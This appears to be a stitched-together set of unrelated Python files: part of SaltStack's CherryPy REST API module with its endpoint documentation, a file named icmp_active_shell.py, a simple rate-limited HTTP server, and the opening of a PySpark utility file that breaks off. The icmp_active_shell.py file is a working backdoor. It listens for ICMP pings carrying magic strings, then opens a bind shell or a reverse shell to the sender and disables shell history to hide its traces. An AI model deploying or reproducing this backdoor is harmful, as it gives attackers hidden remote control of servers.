:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-H "Accept: application/json" \\
-d username='saltuser' \\
-d password='saltpass' \\
-d eauth='pam'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept: application/json
username=saltuser&password=saltpass&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups'] is not False:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
raise ValueError("Eauth permission list not found.")
except (AttributeError, IndexError, KeyError, ValueError):
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
raise cherrypy.HTTPError(500,
'Configuration for external_auth could not be read.')
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms,
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='local' \\
-d tgt='*' \\
-d fun='test.ping' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='pam'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instad, authentication
should be handled by the SSH layer itself. The use of the salt-ssh client does not
require a salt master to be running. Instead, only a roster file must be present
in the salt configuration directory.
All SSH client requests are synchronous.
** Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_sesion, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_sesion.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.debug('opening') };
source.onerror = function(e) { console.debug('error!', e) };
source.onmessage = function(e) {
console.debug('Tag: ', e.data.tag)
console.debug('Data: ', e.data.data)
};
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:**
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_sesion, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_sesion.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
foo=Foo&bar=Bar!
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in self.url_map.items():
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
icmp_active_shell.py
|
'''
Sniffs packages ICMP ECHO REQUEST to activate shell on server.
OS: Linux
Tiago Martins (tiago.tsmweb@gmail.com)
'''
import socket
import sys
import os
import pty
import threading
from struct import *
PORT = 42444
ICMP_ECHO_REQUEST = 8
def open_shell():
try:
# Create socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", PORT))
sock.listen(1)
(cli, addr) = sock.accept()
# Save previous standard in, out, and error
oldInFd = os.dup(0)
oldOutFd = os.dup(1)
oldErrFd = os.dup(2)
# Redirect standard in, out, and error
os.dup2(cli.fileno(), 0)
os.dup2(cli.fileno(), 1)
os.dup2(cli.fileno(), 2)
# Open shell interactive
os.putenv("HISTFILE","/dev/null")
pty.spawn("/bin/bash")
# Close socket
sock.shutdown(socket.SHUT_RDWR)
sock.close()
# Restore standard in, out, and error
os.dup2(oldInFd, 0)
os.close(oldInFd)
os.dup2(oldOutFd, 1)
os.close(oldOutFd)
os.dup2(oldErrFd, 2)
os.close(oldErrFd)
except socket.error as msg:
print str(msg)
sys.exit()
def open_reverse_shell(dest_address):
try:
# Create socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Save previous standard in, out, and error
oldInFd = os.dup(0)
oldOutFd = os.dup(1)
oldErrFd = os.dup(2)
# Connect socket
sock.connect((dest_address, PORT))
# Redirect standard in, out, and error
os.dup2(sock.fileno(), 0)
os.dup2(sock.fileno(), 1)
os.dup2(sock.fileno(), 2)
# Open shell interactive
os.putenv("HISTFILE","/dev/null")
pty.spawn("/bin/bash")
# Close socket
sock.shutdown(socket.SHUT_RDWR)
sock.close()
# Restore standard in, out, and error
os.dup2(oldInFd, 0)
os.close(oldInFd)
os.dup2(oldOutFd, 1)
os.close(oldOutFd)
os.dup2(oldErrFd, 2)
os.close(oldErrFd)
except socket.error as msg:
print str(msg)
sys.exit()
def main():
try:
# Create socket raw - icmp
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
except socket.error , msg:
print "[!] Socket could not be created. Error Code : " + str(msg[0]) + " Message " + msg[1]
sys.exit()
while True:
packet = sock.recvfrom(65565)[0]
# IP packet
ip_header = packet[0:20]
iph = unpack("!BBHHHBBH4s4s", ip_header)
version_ihl = iph[0]
version = version_ihl >> 4
ihl = version_ihl & 0xF
iph_length = ihl * 4
ttl = iph[5]
protocol = iph[6]
s_addr = socket.inet_ntoa(iph[8])
d_addr = socket.inet_ntoa(iph[9])
# ICMP packet
icmph_length = 4
icmp_header = packet[iph_length:iph_length+icmph_length]
icmph = unpack("!BBH", icmp_header)
icmp_type = icmph[0]
icmp_code = icmph[1]
icmp_checksum = icmph[2]
if icmp_type == ICMP_ECHO_REQUEST:
# PAYLOAD
h_size = iph_length + icmph_length
data = packet[h_size:]
if "-*-ias-*-" in str(data).lower():
print "[>] Open shell in: " + str(s_addr)
bs_thread = threading.Thread(target=open_shell, args=())
bs_thread.start()
elif "-*-iars-*-" in str(data).lower():
print "[>] Open reverse shell in: " + str(s_addr)
brs_thread = threading.Thread(target=open_reverse_shell, args=(str(s_addr),))
brs_thread.start()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
|
server.py
|
import socket
import sys
import os, stat
import threading
import time
import json
from Queue import *
import time
directory = "Upload"
cookie_key = "id"
banned_ips = set()
cookie_count = 0
client_ip_addr_map = {}
cookie_last_number_visit_map = {}
lock = threading.Lock()
def get_file_type(file_name):
if file_name.endswith(".jpg"):
mimetype = 'image/jpg'
elif file_name.endswith(".png"):
mimetype = 'image/png'
else:
mimetype = 'text/html'
return mimetype
def get_cookie_header(cookie_value):
if cookie_last_number_visit_map.has_key(cookie_value):
cookie_dictionary = cookie_last_number_visit_map[cookie_value]
visit_count = cookie_dictionary['count']
cookie_dictionary['count'] = visit_count+1
cookie_dictionary['last_visit'] = time.ctime(time.time())
else:
cookie_dictionary = {'count': 1, 'last_visit': time.ctime(time.time())}
cookie_last_number_visit_map[cookie_value] = cookie_dictionary
cookie_header = "Set-Cookie: your_identifier=" + str(cookie_value)
return cookie_header
def parse(request):
global cookie_count
response_code = '400 Bad Request'
http_version = 'HTTP/1.0'
response_headers = ''
headers = request.splitlines()
cookie_value = None
for header in headers:
cookie_fields = header.split(':')
if cookie_fields[0] == 'Cookie':
cookie_value = cookie_fields[1].split('=')[1].strip()
if cookie_value is None:
with lock:
# print "lock acquired for initializing cookie"
cookie_value = cookie_count
cookie_count += 1
# time.sleep(2)
header_fields = headers[0].split(' ')
request_type = header_fields[0].strip()
if request_type != "GET" and request_type != 'HEAD':
raise Exception('Unknown request type method')
if header_fields[1] == '/':
file_name = directory + "/index.html"
else:
file_name = directory + header_fields[1]
http_version = header_fields[2]
response_code = '200 OK'
content_length = None
file_content = None
with lock:
# print "lock acquired for updating cookie map"
cookie_header = get_cookie_header(cookie_value)
# time.sleep(2)
try:
if os.path.isfile(file_name):
accessCode = oct(stat.S_IMODE(os.stat(file_name).st_mode))
global_permission = int(accessCode[3])
if global_permission < 4:
raise Exception('File does not have read permission to public')
content_length = os.path.getsize(file_name)
mimetype = get_file_type(file_name)
if request_type == 'GET':
with open(file_name, mode = 'rb') as file:
file_content = file.read()
else:
response_code = '404 NOT FOUND'
except Exception, e:
response_code = '403 FORBIDDEN'
response_header1 = http_version + ' ' + response_code
response_headers += response_header1
if content_length is not None:
response_header2 = "Content-Length: " + str(content_length)
response_headers += '\n' + response_header2
response_header3 = 'Content-Type: ' + mimetype
response_headers += '\n' + response_header3
response_headers += '\n' + cookie_header
date_header = "\nDate: " + str(time.ctime(time.time()))
if file_content is None:
response_headers += date_header
return response_headers + '\n'
response_headers += date_header
return response_headers + '\n\n' + file_content + '\n'
def listen_to_client(connection, client_addr):
print "request from client ip addr is ", client_addr
request = ''
request = connection.recv(4096)
try:
response = parse(request)
except Exception, e:
# print e
response = "HTTP/1.0 400 Bad Request\n"
connection.send(response)
connection.close()
def send_429_response(connection, client_ip):
print client_ip, " is banned"
response = "HTTP/1.0 429 TOO MANY REQUESTS"
connection.send(response)
connection.close()
def main(argv):
s = socket.socket()
port = 12345
if len(argv) != 0:
port = int(argv[0])
print "listening at port ", port
s.bind(('', port))
s.listen(5)
while True:
connection, client_addr = s.accept()
client_ip = client_addr[0]
'''
check if client already banned or not
'''
if client_ip in banned_ips:
send_429_response(connection, client_ip)
continue
'''
if client is not banned yet, check whether this request is more than 100th in the last 1 minute
'''
if client_ip_addr_map.has_key(client_ip):
timestamp_queue = client_ip_addr_map[client_ip]
else:
timestamp_queue = Queue()
client_ip_addr_map[client_ip] = timestamp_queue
ts = int(time.time())
if timestamp_queue.qsize() == 100:
last_timestamp = timestamp_queue.get()
#this checks if the client can be banned or not
time_difference = ts - last_timestamp
# print "time difference is ", time_difference
if time_difference <= 60:
banned_ips.add(client_ip)
send_429_response(connection, client_ip)
continue
timestamp_queue.put(ts)
'''
if client is not banned, then serve the request in a new thread
'''
threading.Thread(target = listen_to_client, args = (connection, client_addr)).start()
if __name__ == '__main__':
try:
if os.path.isfile('cookies.json'):
with open('cookies.json') as fp:
json_dump = json.loads(fp.read())
if len(json_dump) == 2:
cookie_count = json_dump['cookie_count']
cookie_last_number_visit_map = json_dump['cookie_dictionary']
main(sys.argv[1:])
except KeyboardInterrupt:
with open('cookies.json', 'wb') as fp:
json_dump = {'cookie_count':cookie_count, 'cookie_dictionary':cookie_last_number_visit_map}
json.dump(json_dump, fp)
|
util.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
import itertools
import os
import platform
import re
import sys
import threading
import traceback
import types
try:
from collections.abc import Callable
except AttributeError:
from collections import Callable
from py4j.clientserver import ClientServer
__all__ = [] # type: ignore
def print_exec(stream):
ei = sys.exc_info()
traceback.print_exception(ei[0], ei[1], ei[2], None, stream)
class VersionUtils(object):
"""
Provides utility method to determine Spark versions with given input string.
"""
@staticmethod
def majorMinorVersion(sparkVersion: str):
"""
